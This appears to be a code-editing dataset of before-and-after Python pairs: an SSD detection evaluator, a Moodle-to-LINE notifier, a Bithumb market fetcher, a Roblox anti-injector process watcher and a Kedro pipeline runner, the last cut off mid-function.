    print(f"\nAverage Precision Across All Classes:{sum(aps)/len(aps)}")
| import torch
from vision.ssd.vgg_ssd import create_vgg_ssd, create_vgg_ssd_predictor
from vision.ssd.mobilenetv1_ssd import create_mobilenetv1_ssd, create_mobilenetv1_ssd_predictor
from vision.ssd.mobilenetv1_ssd_lite import create_mobilenetv1_ssd_lite, create_mobilenetv1_ssd_lite_predictor
from vision.ssd.squeezenet_ssd_lite import create_squeezenet_ssd_lite, create_squeezenet_ssd_lite_predictor
from vision.datasets.voc_dataset import VOCDataset
from vision.datasets.open_images import OpenImagesDataset
from vision.utils import box_utils, measurements
from vision.utils.misc import str2bool, Timer
from vision.datasets.piap_dataset import PIAPDataset
import argparse
import pathlib
import numpy as np
import logging
import sys
from vision.ssd.mobilenet_v2_ssd_lite import create_mobilenetv2_ssd_lite, create_mobilenetv2_ssd_lite_predictor
# Command-line interface for the SSD evaluation script.
parser = argparse.ArgumentParser(description="SSD Evaluation on VOC Dataset.")
parser.add_argument('--net', default="vgg16-ssd",
                    help="The network architecture, it should be of mb1-ssd, mb1-ssd-lite, mb2-ssd-lite or vgg16-ssd.")
parser.add_argument("--trained_model", type=str)
parser.add_argument("--dataset_type", default="voc", type=str,
                    help='Specify dataset type. Currently support voc and open_images.')
parser.add_argument("--dataset", type=str, help="The root directory of the VOC dataset or Open Images dataset.")
parser.add_argument("--label_file", type=str, help="The label file path.")
parser.add_argument("--use_cuda", type=str2bool, default=True)
parser.add_argument("--use_2007_metric", type=str2bool, default=True)
parser.add_argument("--nms_method", type=str, default="hard")
parser.add_argument("--iou_threshold", type=float, default=0.5, help="The threshold of Intersection over Union.")
parser.add_argument("--eval_dir", default="eval_results", type=str, help="The directory to store evaluation results.")
parser.add_argument('--mb2_width_mult', default=1.0, type=float,
                    help='Width Multiplifier for MobilenetV2')
args = parser.parse_args()
# Use the first CUDA device only when available and requested.
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() and args.use_cuda else "cpu")
def group_annotation_by_class(dataset):
    """Index ground-truth annotations by class and image.

    Args:
        dataset: object exposing ``__len__`` and ``get_annotation(i)`` which
            returns ``(image_id, (gt_boxes, classes, is_difficult))`` with
            numpy arrays.

    Returns:
        tuple: ``(true_case_stat, all_gt_boxes, all_difficult_cases)`` where
            true_case_stat maps class index -> count of non-difficult boxes,
            all_gt_boxes maps class -> image_id -> stacked (N, 4) tensor, and
            all_difficult_cases maps class -> image_id -> tensor of flags.
    """
    true_case_stat = {}
    all_gt_boxes = {}
    all_difficult_cases = {}
    for i in range(len(dataset)):
        image_id, annotation = dataset.get_annotation(i)
        gt_boxes, classes, is_difficult = annotation
        gt_boxes = torch.from_numpy(gt_boxes)
        # Use a distinct index name so the outer dataset index is not shadowed.
        for j, difficult in enumerate(is_difficult):
            class_index = int(classes[j])
            gt_box = gt_boxes[j]
            if not difficult:
                # Only non-difficult boxes count toward the recall denominator.
                true_case_stat[class_index] = true_case_stat.get(class_index, 0) + 1
            all_gt_boxes.setdefault(class_index, {}).setdefault(image_id, []).append(gt_box)
            all_difficult_cases.setdefault(class_index, {}).setdefault(image_id, []).append(difficult)
    for class_index in all_gt_boxes:
        for image_id in all_gt_boxes[class_index]:
            all_gt_boxes[class_index][image_id] = torch.stack(all_gt_boxes[class_index][image_id])
    for class_index in all_difficult_cases:
        for image_id in all_difficult_cases[class_index]:
            # BUG FIX: the original assigned this tensor into all_gt_boxes
            # (clobbering the stacked boxes) and never converted the
            # difficult flags.
            all_difficult_cases[class_index][image_id] = torch.tensor(
                all_difficult_cases[class_index][image_id])
    return true_case_stat, all_gt_boxes, all_difficult_cases
def compute_average_precision_per_class(num_true_cases, gt_boxes, difficult_cases,
                                        prediction_file, iou_threshold, use_2007_metric):
    """Compute one class's average precision from a VOC-style detection file.

    Args:
        num_true_cases (int): number of non-difficult ground-truth boxes.
        gt_boxes (dict): image_id -> tensor of ground-truth boxes.
        difficult_cases (dict): image_id -> per-box difficult flags.
        prediction_file: path to lines of "image_id score x1 y1 x2 y2"
            with 1-based (MATLAB-style) coordinates.
        iou_threshold (float): minimum IoU for a detection to match a gt box.
        use_2007_metric (bool): use the VOC2007 11-point interpolated AP.

    Returns:
        The average precision as computed by the measurements helper.
    """
    with open(prediction_file) as f:
        image_ids = []
        boxes = []
        scores = []
        for line in f:
            t = line.rstrip().split(" ")
            image_ids.append(t[0])
            scores.append(float(t[1]))
            box = torch.tensor([float(v) for v in t[2:]]).unsqueeze(0)
            box -= 1.0  # convert to python format where indexes start from 0
            boxes.append(box)
        # Rank detections by descending confidence before greedy matching.
        scores = np.array(scores)
        sorted_indexes = np.argsort(-scores)
        boxes = [boxes[i] for i in sorted_indexes]
        image_ids = [image_ids[i] for i in sorted_indexes]
        true_positive = np.zeros(len(image_ids))
        false_positive = np.zeros(len(image_ids))
        matched = set()  # (image_id, gt_index) pairs already claimed by a detection
        for i, image_id in enumerate(image_ids):
            box = boxes[i]
            if image_id not in gt_boxes:
                false_positive[i] = 1
                continue
            gt_box = gt_boxes[image_id]
            ious = box_utils.iou_of(box, gt_box)
            max_iou = torch.max(ious).item()
            max_arg = torch.argmax(ious).item()
            if max_iou > iou_threshold:
                if difficult_cases[image_id][max_arg] == 0:
                    if (image_id, max_arg) not in matched:
                        true_positive[i] = 1
                        matched.add((image_id, max_arg))
                    else:
                        # Duplicate detection of an already-matched gt box.
                        false_positive[i] = 1
                # Matches to difficult boxes count as neither TP nor FP.
            else:
                false_positive[i] = 1
    true_positive = true_positive.cumsum()
    false_positive = false_positive.cumsum()
    precision = true_positive / (true_positive + false_positive)
    recall = true_positive / num_true_cases
    if use_2007_metric:
        return measurements.compute_voc2007_average_precision(precision, recall)
    else:
        return measurements.compute_average_precision(precision, recall)
if __name__ == '__main__':
    eval_path = pathlib.Path(args.eval_dir)
    eval_path.mkdir(exist_ok=True)
    timer = Timer()
    class_names = [name.strip() for name in open(args.label_file).readlines()]

    # Build the evaluation dataset.
    if args.dataset_type == "voc":
        dataset = VOCDataset(args.dataset, is_test=True)
    elif args.dataset_type == 'open_images':
        dataset = OpenImagesDataset(args.dataset, dataset_type="test")
    # BUG FIX: `else <expr>:` is a SyntaxError — this branch must be an elif,
    # with a real else below to reject unknown dataset types.
    elif args.dataset_type == 'piap':
        dataset = PIAPDataset(args.dataset, is_test=True)
    else:
        logging.fatal("The dataset type is wrong. It should be one of voc, open_images and piap.")
        parser.print_help(sys.stderr)
        sys.exit(1)
    true_case_stat, all_gb_boxes, all_difficult_cases = group_annotation_by_class(dataset)

    # Instantiate the requested network architecture.
    if args.net == 'vgg16-ssd':
        net = create_vgg_ssd(len(class_names), is_test=True)
    elif args.net == 'mb1-ssd':
        net = create_mobilenetv1_ssd(len(class_names), is_test=True)
    elif args.net == 'mb1-ssd-lite':
        net = create_mobilenetv1_ssd_lite(len(class_names), is_test=True)
    elif args.net == 'sq-ssd-lite':
        net = create_squeezenet_ssd_lite(len(class_names), is_test=True)
    elif args.net == 'mb2-ssd-lite':
        net = create_mobilenetv2_ssd_lite(len(class_names), width_mult=args.mb2_width_mult, is_test=True)
    else:
        logging.fatal("The net type is wrong. It should be one of vgg16-ssd, mb1-ssd and mb1-ssd-lite.")
        parser.print_help(sys.stderr)
        sys.exit(1)

    timer.start("Load Model")
    net.load(args.trained_model)
    net = net.to(DEVICE)
    print(f'It took {timer.end("Load Model")} seconds to load the model.')

    # Wrap the network in the matching predictor (decoding + NMS).
    if args.net == 'vgg16-ssd':
        predictor = create_vgg_ssd_predictor(net, nms_method=args.nms_method, device=DEVICE)
    elif args.net == 'mb1-ssd':
        predictor = create_mobilenetv1_ssd_predictor(net, nms_method=args.nms_method, device=DEVICE)
    elif args.net == 'mb1-ssd-lite':
        predictor = create_mobilenetv1_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
    elif args.net == 'sq-ssd-lite':
        predictor = create_squeezenet_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
    elif args.net == 'mb2-ssd-lite':
        predictor = create_mobilenetv2_ssd_lite_predictor(net, nms_method=args.nms_method, device=DEVICE)
    else:
        logging.fatal("The net type is wrong. It should be one of vgg16-ssd, mb1-ssd and mb1-ssd-lite.")
        parser.print_help(sys.stderr)
        sys.exit(1)

    # Run detection over the whole dataset, accumulating one row per box:
    # [image_index, label, score, x1, y1, x2, y2].
    results = []
    for i in range(len(dataset)):
        print("process image", i)
        timer.start("Load Image")
        image = dataset.get_image(i)
        print("Load Image: {:4f} seconds.".format(timer.end("Load Image")))
        timer.start("Predict")
        boxes, labels, probs = predictor.predict(image)
        print("Prediction: {:4f} seconds.".format(timer.end("Predict")))
        indexes = torch.ones(labels.size(0), 1, dtype=torch.float32) * i
        results.append(torch.cat([
            indexes.reshape(-1, 1),
            labels.reshape(-1, 1).float(),
            probs.reshape(-1, 1),
            boxes + 1.0  # matlab's indexes start from 1
        ], dim=1))
    results = torch.cat(results)

    # Write per-class detection files in the VOC submission format.
    for class_index, class_name in enumerate(class_names):
        if class_index == 0:
            continue  # ignore background
        prediction_path = eval_path / f"det_test_{class_name}.txt"
        with open(prediction_path, "w") as f:
            sub = results[results[:, 1] == class_index, :]
            for i in range(sub.size(0)):
                prob_box = sub[i, 2:].numpy()
                image_id = dataset.ids[int(sub[i, 0])]
                print(
                    image_id + " " + " ".join([str(v) for v in prob_box]),
                    file=f
                )

    aps = []
    print("\n\nAverage Precision Per-class:")
    for class_index, class_name in enumerate(class_names):
        if class_index == 0:
            continue
        prediction_path = eval_path / f"det_test_{class_name}.txt"
        ap = compute_average_precision_per_class(
            true_case_stat[class_index],
            all_gb_boxes[class_index],
            all_difficult_cases[class_index],
            prediction_path,
            args.iou_threshold,
            args.use_2007_metric
        )
        aps.append(ap)
        print(f"{class_name}: {ap}")

    print(f"\nAverage Precision Across All Classes:{sum(aps)/len(aps)}")
|
import requests
import datetime
import time
import os
from lotify.client import Client
def moodle_notify():
    """Check Moodle for course contents, assignments and quizzes updated in
    the last day and push a LINE Notify message for each.

    Reads MOODLE_TOKEN, LINE_TOKEN and MOODLE_URL from the environment;
    MOODLE_URL is expected to end with a trailing slash.
    """
    lotify = Client()
    moodle_token = os.environ.get("MOODLE_TOKEN")
    line_token = os.environ.get("LINE_TOKEN")
    # BUG FIX: inner quotes must differ from the outer f-string quote
    # (SyntaxError before Python 3.12); same fix applies to every message below.
    url = f"{os.environ.get('MOODLE_URL')}webservice/rest/server.php"
    current_time = int(time.time())
    day_time = 86400  # one day, in seconds
    GMT8 = 28800  # UTC+8 offset, in seconds
    params = {"moodlewsrestformat": "json",
              "wsfunction": "core_webservice_get_site_info", "wstoken": moodle_token}
    user_id = requests.get(url, params).json()["userid"]
    params["wsfunction"] = "core_enrol_get_users_courses"
    params["userid"] = user_id
    courses = requests.get(url, params).json()
    params["wsfunction"] = "core_course_get_contents"
    params.pop("userid")
    type_params = {"moodlewsrestformat": "json", "wstoken": moodle_token}
    for course in courses:
        # Newly modified course contents.
        params["courseid"] = course["id"]
        course_content = requests.get(url, params).json()
        for section in course_content:
            for module in section["modules"]:
                if module.get("contents") is None:
                    continue
                for content in module["contents"]:
                    if int(content["timemodified"]) >= current_time - day_time:
                        lotify.send_message(
                            line_token,
                            f"{course['fullname']}\n{module['modplural']}: {module['name']}\nCheck it on moodle")
        # assignments notify
        type_params["wsfunction"] = "mod_assign_get_assignments"
        type_params["courseids[0]"] = course["id"]
        assignments = requests.get(url, type_params).json()[
            "courses"][0]["assignments"]
        for assignment in assignments:
            if int(assignment["timemodified"]) >= current_time - day_time and current_time <= int(assignment["duedate"]):
                # NOTE(review): utcfromtimestamp is deprecated in Python 3.12;
                # kept for behavior parity — the +GMT8 shift renders UTC+8.
                due_date = datetime.datetime.utcfromtimestamp(
                    int(assignment['duedate']) + GMT8).strftime('%Y-%m-%d %H:%M:%S')
                lotify.send_message(
                    line_token,
                    f"{course['fullname']}\n作業: {assignment['name']}\nDue: {due_date}\nCheck it on moodle")
            if int(assignment["timemodified"]) >= current_time - day_time and assignment["duedate"] == 0:
                lotify.send_message(
                    line_token,
                    f"{course['fullname']}\n作業: {assignment['name']}\nCheck it on moodle")
        # quiz notify
        type_params["wsfunction"] = "mod_quiz_get_quizzes_by_courses"
        quizzes = requests.get(url, type_params).json()["quizzes"]
        for quiz in quizzes:
            if current_time <= int(quiz["timeclose"]) and int(quiz["timeopen"]) >= current_time - day_time:
                close_time = datetime.datetime.utcfromtimestamp(
                    int(quiz['timeclose']) + GMT8).strftime('%Y-%m-%d %H:%M:%S')
                lotify.send_message(
                    line_token,
                    f"{course['fullname']}\n考試: {quiz['name']}\nClose time: {close_time}\nCheck it on moodle")
# Run the notifier when executed as a script.
if __name__ == "__main__":
    moodle_notify()
| import requests
import datetime
import time
import os
from lotify.client import Client
def moodle_notify():
    """Poll Moodle web services and push LINE notifications for recent activity.

    Reads MOODLE_TOKEN, LINE_TOKEN and MOODLE_URL from the environment.
    Sends one LINE message (via lotify) per course content item modified
    within the last day, plus recently changed assignments and quizzes.
    """
    lotify = Client()
    moodleToken = os.environ.get("MOODLE_TOKEN")
    lineToken = os.environ.get("LINE_TOKEN")
    url = f"{os.environ.get('MOODLE_URL')}webservice/rest/server.php"
    currentTime = int(time.time())
    dayTime = 86400  # one day, in seconds
    GMT8 = 28800  # UTC+8 offset in seconds
    # Only notify about items changed after this cutoff.
    cutoff = currentTime - dayTime

    def fmt_ts(ts):
        # Render a unix timestamp as a UTC+8 human-readable string.
        # NOTE(review): utcfromtimestamp is deprecated since Python 3.12;
        # consider datetime.fromtimestamp(ts, tz=timezone.utc) upstream.
        return datetime.datetime.utcfromtimestamp(
            ts + GMT8).strftime('%Y-%m-%d %H:%M:%S')

    # Resolve the current user, then the courses they are enrolled in.
    params = {"moodlewsrestformat": "json",
              "wsfunction": "core_webservice_get_site_info", "wstoken": moodleToken}
    userId = requests.get(url, params).json()["userid"]
    params["wsfunction"] = "core_enrol_get_users_courses"
    params["userid"] = userId
    courses = requests.get(url, params).json()
    params["wsfunction"] = "core_course_get_contents"
    params.pop("userid")
    typeParams = {"moodlewsrestformat": "json", "wstoken": moodleToken}
    for course in courses:
        # Course content notify: one message per recently modified item.
        params["courseid"] = course["id"]
        courseContent = requests.get(url, params).json()
        for section in courseContent:
            for module in section["modules"]:
                if module.get("contents") is None:  # was `== None` — use identity test
                    continue
                for content in module["contents"]:
                    if int(content["timemodified"]) >= cutoff:
                        lotify.send_message(
                            lineToken, f"{course['fullname']}\n{module['modplural']}: {module['name']}\nCheck it on moodle")
        # Assignments notify (fixed `assingment` typo).
        typeParams["wsfunction"] = "mod_assign_get_assignments"
        typeParams["courseids[0]"] = course["id"]
        assignments = requests.get(url, typeParams).json()[
            "courses"][0]["assignments"]
        for assignment in assignments:
            recently_modified = int(assignment["timemodified"]) >= cutoff
            if recently_modified and currentTime <= int(assignment["duedate"]):
                dueDate = fmt_ts(int(assignment['duedate']))
                lotify.send_message(
                    lineToken, f"{course['fullname']}\n作業: {assignment['name']}\nDue: {dueDate}\nCheck it on moodle")
            if recently_modified and assignment["duedate"] == 0:
                lotify.send_message(
                    lineToken, f"{course['fullname']}\n作業: {assignment['name']}\nCheck it on moodle")
        # Quiz notify.
        typeParams["wsfunction"] = "mod_quiz_get_quizzes_by_courses"
        quizzes = requests.get(url, typeParams).json()["quizzes"]
        for quiz in quizzes:
            if currentTime <= int(quiz["timeclose"]) and int(quiz["timeopen"]) >= cutoff:
                closeTime = fmt_ts(int(quiz['timeclose']))
                lotify.send_message(
                    lineToken, f"{course['fullname']}\n考試: {quiz['name']}\nClose time: {closeTime}\nCheck it on moodle")
# Run the notifier once when executed as a script.
if __name__ == "__main__":
    moodle_notify()
|
import logging
from typing import Any, Dict, List
from .utils import get_json
logging.basicConfig(level=logging.INFO)
def fetch_markets(market_type: str) -> Dict[str, Any]:
    """Fetch all trading markets of the given type from the crypto exchange.

    Args:
        market_type: Which market segment to fetch; only 'spot' is supported.

    Returns:
        The exchange's market-config payload as a dict ({} on API error).
        (The previous ``List[...]`` annotation was wrong: the spot fetcher
        returns a dict.)

    Raises:
        ValueError: If ``market_type`` is not a supported market type.
    """
    if market_type == 'spot':
        return _fetch_spot_markets()
    raise ValueError(f'Unknown market type: {market_type}')
def _fetch_spot_markets() -> Dict[str, Any]:
    """Fetch the spot market config from Bithumb; return {} on an API error."""
    url = 'https://global-openapi.bithumb.pro/openapi/v1/spot/config'
    resp: Dict[str, Any] = get_json(url)
    if resp['code'] != "0":
        # Lazy %-style args instead of a nested-quote f-string: the original
        # form required Python 3.12 (PEP 701) and formatted eagerly.
        logging.error("code : %s, msg: %s", resp['code'], resp['msg'])
        return {}
    data = resp['data']
    for coin in data['coinConfig']:
        # Strip per-coin fields the caller does not need.
        del coin['withdrawFee']
        del coin['depositStatus']
        del coin['withdrawStatus']
    return data
| import logging
from typing import Any, Dict, List
from .utils import get_json
logging.basicConfig(level=logging.INFO)
def fetch_markets(market_type: str) -> Dict[str, Any]:
    """Fetch all trading markets of the given type from the crypto exchange.

    Args:
        market_type: Which market segment to fetch; only 'spot' is supported.

    Returns:
        The exchange's market-config payload as a dict ({} on API error).
        (The previous ``List[...]`` annotation was wrong: the spot fetcher
        returns a dict.)

    Raises:
        ValueError: If ``market_type`` is not a supported market type.
    """
    if market_type == 'spot':
        return _fetch_spot_markets()
    raise ValueError(f'Unknown market type: {market_type}')
def _fetch_spot_markets() -> Dict[str, Any]:
    """Fetch the spot market config from Bithumb; return {} on an API error."""
    url = 'https://global-openapi.bithumb.pro/openapi/v1/spot/config'
    resp: Dict[str, Any] = get_json(url)
    if resp['code'] != "0":
        # Lazy %-style args: skip string formatting when the level is off,
        # per the logging module's recommended usage.
        logging.error("code : %s, msg: %s", resp['code'], resp['msg'])
        return {}
    data = resp['data']
    for coin in data['coinConfig']:
        # Strip per-coin fields the caller does not need.
        del coin['withdrawFee']
        del coin['depositStatus']
        del coin['withdrawStatus']
    return data
|
from psutil import process_iter
from os import system
version = 1.0
author = 'Ivan Perzhinsky'
roblox = 'RobloxPlayerBeta.exe'
trx = 'TRX.exe'
roblox_kill_command = f'taskkill /F /IM {roblox}'
def get_processes_names():
    """Return the names of every currently running process."""
    names = []
    for process in process_iter():
        names.append(process.name())
    return names
def kill_roblox():
    """Force-kill Roblox if it is running.

    ``taskkill /F /IM`` terminates every process with that image name in a
    single call, so invoking it once is enough — the original re-ran it for
    every matching process. Stop after the first match.
    """
    for proc in process_iter():
        if proc.name() == roblox:
            system(roblox_kill_command)
            break
# --- script entry: watch for the TRX injector targeting Roblox ---
import time  # local import: used only by this watch loop

print('Welcome to Roblox protector from TRX injector.')
# Note: the original nested single quotes inside a single-quoted f-string,
# which is a syntax error before Python 3.12 (PEP 701).
print(f'Version: {str(version).replace(".", ",")}.')
print(f'By {author}.')
print('\nStarting listener.')
print('Press [CTRL + C] to stop.\n')
while True:
    try:
        processes = get_processes_names()
        if roblox in processes and trx in processes:
            print('Roblox detected.')
            print('TRX Detected.')
            print('Killing roblox.\n')
            kill_roblox()
            print('\nRoblox killed.')
            print('Continuing work...')
        # Yield the CPU between scans; the original loop busy-waited at 100%.
        time.sleep(1)
    except KeyboardInterrupt:
        print('\nInterrupted.')
        break
| from psutil import process_iter
from os import system
version = 1.0
author = 'Ivan Perzhinsky'
roblox = 'RobloxPlayerBeta.exe'
trx = 'TRX.exe'
roblox_kill_command = f'taskkill /F /IM {roblox}'
def get_processes_names():
    """Return the names of every currently running process."""
    names = []
    for process in process_iter():
        names.append(process.name())
    return names
def kill_roblox():
    """Force-kill Roblox if it is running.

    ``taskkill /F /IM`` terminates every process with that image name in a
    single call, so invoking it once is enough — the original re-ran it for
    every matching process. Stop after the first match.
    """
    for proc in process_iter():
        if proc.name() == roblox:
            system(roblox_kill_command)
            break
# --- script entry: watch for the TRX injector targeting Roblox ---
import time  # local import: used only by this watch loop

print('Welcome to Roblox protector from TRX injector.')
print(f'Version: {str(version).replace(".", ",")}.')
print(f'By {author}.')
print('\nStarting listener.')
print('Press [CTRL + C] to stop.\n')
while True:
    try:
        processes = get_processes_names()
        if roblox in processes and trx in processes:
            print('Roblox detected.')
            print('TRX Detected.')
            print('Killing roblox.\n')
            kill_roblox()
            print('\nRoblox killed.')
            print('Continuing work...')
        # Yield the CPU between scans; the original loop busy-waited at 100%.
        time.sleep(1)
    except KeyboardInterrupt:
        print('\nInterrupted.')
        break
|
"""``AbstractRunner`` is the base class for all ``Pipeline`` runner
implementations.
"""
import logging
from abc import ABC, abstractmethod
from concurrent.futures import (
ALL_COMPLETED,
Future,
ThreadPoolExecutor,
as_completed,
wait,
)
from typing import Any, Dict, Iterable
from pluggy import PluginManager
from kedro.framework.hooks.manager import _NullPluginManager
from kedro.io import AbstractDataSet, DataCatalog
from kedro.pipeline import Pipeline
from kedro.pipeline.node import Node
class AbstractRunner(ABC):
    """``AbstractRunner`` is the base class for all ``Pipeline`` runner
    implementations.
    """

    def __init__(self, is_async: bool = False):
        """Instantiates the runner class.

        Args:
            is_async: If True, the node inputs and outputs are loaded and saved
                asynchronously with threads. Defaults to False.
        """
        self._is_async = is_async

    @property
    def _logger(self):
        # Logger named after the concrete runner's module.
        return logging.getLogger(self.__module__)

    def run(
        self,
        pipeline: Pipeline,
        catalog: DataCatalog,
        hook_manager: PluginManager = None,
        session_id: str = None,
    ) -> Dict[str, Any]:
        """Run the ``Pipeline`` using the datasets provided by ``catalog``
        and save results back to the same objects.

        Args:
            pipeline: The ``Pipeline`` to run.
            catalog: The ``DataCatalog`` from which to fetch data.
            hook_manager: The ``PluginManager`` to activate hooks.
            session_id: The id of the session.

        Raises:
            ValueError: Raised when ``Pipeline`` inputs cannot be satisfied.

        Returns:
            Any node outputs that cannot be processed by the ``DataCatalog``.
            These are returned in a dictionary, where the keys are defined
            by the node outputs.
        """
        hook_manager = hook_manager or _NullPluginManager()
        # Copy so default datasets registered below don't mutate the
        # caller's catalog.
        catalog = catalog.shallow_copy()
        unsatisfied = pipeline.inputs() - set(catalog.list())
        if unsatisfied:
            raise ValueError(
                f"Pipeline input(s) {unsatisfied} not found in the DataCatalog"
            )
        # Outputs without a catalog entry are loaded back and returned
        # to the caller at the end of the run.
        free_outputs = pipeline.outputs() - set(catalog.list())
        unregistered_ds = pipeline.data_sets() - set(catalog.list())
        for ds_name in unregistered_ds:
            catalog.add(ds_name, self.create_default_data_set(ds_name))
        if self._is_async:
            self._logger.info(
                "Asynchronous mode is enabled for loading and saving data"
            )
        self._run(pipeline, catalog, hook_manager, session_id)
        self._logger.info("Pipeline execution completed successfully.")
        return {ds_name: catalog.load(ds_name) for ds_name in free_outputs}

    def run_only_missing(
        self, pipeline: Pipeline, catalog: DataCatalog, hook_manager: PluginManager
    ) -> Dict[str, Any]:
        """Run only the missing outputs from the ``Pipeline`` using the
        datasets provided by ``catalog``, and save results back to the
        same objects.

        Args:
            pipeline: The ``Pipeline`` to run.
            catalog: The ``DataCatalog`` from which to fetch data.
            hook_manager: The ``PluginManager`` to activate hooks.

        Raises:
            ValueError: Raised when ``Pipeline`` inputs cannot be
                satisfied.

        Returns:
            Any node outputs that cannot be processed by the
            ``DataCatalog``. These are returned in a dictionary, where
            the keys are defined by the node outputs.
        """
        free_outputs = pipeline.outputs() - set(catalog.list())
        missing = {ds for ds in catalog.list() if not catalog.exists(ds)}
        to_build = free_outputs | missing
        # Rerun the nodes that produce the missing data, plus everything
        # downstream of them.
        to_rerun = pipeline.only_nodes_with_outputs(*to_build) + pipeline.from_inputs(
            *to_build
        )
        # We also need any missing datasets that are required to run the
        # `to_rerun` pipeline, including any chains of missing datasets.
        unregistered_ds = pipeline.data_sets() - set(catalog.list())
        output_to_unregistered = pipeline.only_nodes_with_outputs(*unregistered_ds)
        input_from_unregistered = to_rerun.inputs() & unregistered_ds
        to_rerun += output_to_unregistered.to_outputs(*input_from_unregistered)
        return self.run(to_rerun, catalog, hook_manager)

    @abstractmethod  # pragma: no cover
    def _run(
        self,
        pipeline: Pipeline,
        catalog: DataCatalog,
        hook_manager: PluginManager,
        session_id: str = None,
    ) -> None:
        """The abstract interface for running pipelines, assuming that the
        inputs have already been checked and normalized by run().

        Args:
            pipeline: The ``Pipeline`` to run.
            catalog: The ``DataCatalog`` from which to fetch data.
            hook_manager: The ``PluginManager`` to activate hooks.
            session_id: The id of the session.
        """
        pass

    @abstractmethod  # pragma: no cover
    def create_default_data_set(self, ds_name: str) -> AbstractDataSet:
        """Factory method for creating the default dataset for the runner.

        Args:
            ds_name: Name of the missing dataset.

        Returns:
            An instance of an implementation of ``AbstractDataSet`` to be
            used for all unregistered datasets.
        """
        pass

    def _suggest_resume_scenario(
        self, pipeline: Pipeline, done_nodes: Iterable[Node]
    ) -> None:
        # Log a hint telling the user how to resume a partially-failed run.
        remaining_nodes = set(pipeline.nodes) - set(done_nodes)
        postfix = ""
        if done_nodes:
            node_names = (n.name for n in remaining_nodes)
            resume_p = pipeline.only_nodes(*node_names)
            # Restart from the nodes whose inputs are free pipeline inputs.
            start_p = resume_p.only_nodes_with_inputs(*resume_p.inputs())
            start_node_names = (n.name for n in start_p.nodes)
            # Single-quoted ',' inside the f-string: the original nested a
            # double quote inside a double-quoted f-string, which is a
            # syntax error before Python 3.12 (PEP 701).
            postfix += f" --from-nodes \"{','.join(start_node_names)}\""
        self._logger.warning(
            "There are %d nodes that have not run.\n"
            "You can resume the pipeline run by adding the following "
            "argument to your previous command:\n%s",
            len(remaining_nodes),
            postfix,
        )
def run_node(
    node: Node,
    catalog: DataCatalog,
    hook_manager: PluginManager,
    is_async: bool = False,
    session_id: str = None,
) -> Node:
    """Execute one ``Node``, reading inputs from and writing outputs to `catalog`.

    Args:
        node: The ``Node`` to run.
        catalog: A ``DataCatalog`` holding the node's inputs and outputs.
        hook_manager: The ``PluginManager`` used to fire hooks.
        is_async: When True, inputs/outputs are loaded and saved on threads.
            Defaults to False.
        session_id: The session id of the pipeline run.

    Returns:
        The node argument.
    """
    runner = _run_node_async if is_async else _run_node_sequential
    node = runner(node, catalog, hook_manager, session_id)
    for confirmed_name in node.confirms:
        catalog.confirm(confirmed_name)
    return node
def _collect_inputs_from_hook(
    node: Node,
    catalog: DataCatalog,
    inputs: Dict[str, Any],
    is_async: bool,
    hook_manager: PluginManager,
    session_id: str = None,
) -> Dict[str, Any]:
    """Invoke ``before_node_run`` hooks and merge any extra inputs they return."""
    # pylint: disable=too-many-arguments
    inputs = inputs.copy()  # shallow copy so hooks cannot mutate the caller's dict
    hook_response = hook_manager.hook.before_node_run(
        node=node,
        catalog=catalog,
        inputs=inputs,
        is_async=is_async,
        session_id=session_id,
    )
    additional_inputs: Dict[str, Any] = {}
    # A _NullPluginManager returns None rather than a list of hook results.
    if hook_response is None:
        return additional_inputs
    for response in hook_response:
        if response is None:
            continue
        if not isinstance(response, dict):
            response_type = type(response).__name__
            raise TypeError(
                f"'before_node_run' must return either None or a dictionary mapping "
                f"dataset names to updated values, got '{response_type}' instead."
            )
        additional_inputs.update(response)
    return additional_inputs
def _call_node_run(
    node: Node,
    catalog: DataCatalog,
    inputs: Dict[str, Any],
    is_async: bool,
    hook_manager: PluginManager,
    session_id: str = None,
) -> Dict[str, Any]:
    """Run ``node.run``, firing error/after hooks; return the node's outputs."""
    # pylint: disable=too-many-arguments
    # The two hook calls share the same context keywords; build them once.
    hook_kwargs = dict(
        node=node,
        catalog=catalog,
        inputs=inputs,
        is_async=is_async,
        session_id=session_id,
    )
    try:
        outputs = node.run(inputs)
    except Exception as exc:
        # Let hooks observe the failure before re-raising it unchanged.
        hook_manager.hook.on_node_error(error=exc, **hook_kwargs)
        raise exc
    hook_manager.hook.after_node_run(outputs=outputs, **hook_kwargs)
    return outputs
def _run_node_sequential(
    node: Node,
    catalog: DataCatalog,
    hook_manager: PluginManager,
    session_id: str = None,
) -> Node:
    """Load inputs, run the node, and save outputs — all on the calling thread."""
    is_async = False
    inputs = {}
    for input_name in node.inputs:
        hook_manager.hook.before_dataset_loaded(dataset_name=input_name)
        loaded = catalog.load(input_name)
        hook_manager.hook.after_dataset_loaded(dataset_name=input_name, data=loaded)
        inputs[input_name] = loaded
    # Hooks may contribute or override inputs before the node executes.
    inputs.update(
        _collect_inputs_from_hook(
            node, catalog, inputs, is_async, hook_manager, session_id=session_id
        )
    )
    outputs = _call_node_run(
        node, catalog, inputs, is_async, hook_manager, session_id=session_id
    )
    for output_name, value in outputs.items():
        hook_manager.hook.before_dataset_saved(dataset_name=output_name, data=value)
        catalog.save(output_name, value)
        hook_manager.hook.after_dataset_saved(dataset_name=output_name, data=value)
    return node
def _run_node_async(
    node: Node,
    catalog: DataCatalog,
    hook_manager: PluginManager,
    session_id: str = None,
) -> Node:
    """Run a single node with inputs loaded and outputs saved on a thread pool.

    Args:
        node: The ``Node`` to run.
        catalog: A ``DataCatalog`` containing the node's inputs and outputs.
        hook_manager: The ``PluginManager`` to activate hooks.
        session_id: The session id of the pipeline run.

    Returns:
        The node argument.
    """
    def _synchronous_dataset_load(dataset_name: str):
        """Minimal wrapper to ensure Hooks are run synchronously
        within an asynchronous dataset load."""
        hook_manager.hook.before_dataset_loaded(dataset_name=dataset_name)
        return_ds = catalog.load(dataset_name)
        hook_manager.hook.after_dataset_loaded(
            dataset_name=dataset_name, data=return_ds
        )
        return return_ds

    with ThreadPoolExecutor() as pool:
        # Submit all input loads concurrently, then block until every future
        # resolves before materializing the results into plain values.
        inputs: Dict[str, Future] = {}
        for name in node.inputs:
            inputs[name] = pool.submit(_synchronous_dataset_load, name)
        wait(inputs.values(), return_when=ALL_COMPLETED)
        inputs = {key: value.result() for key, value in inputs.items()}
        is_async = True
        additional_inputs = _collect_inputs_from_hook(
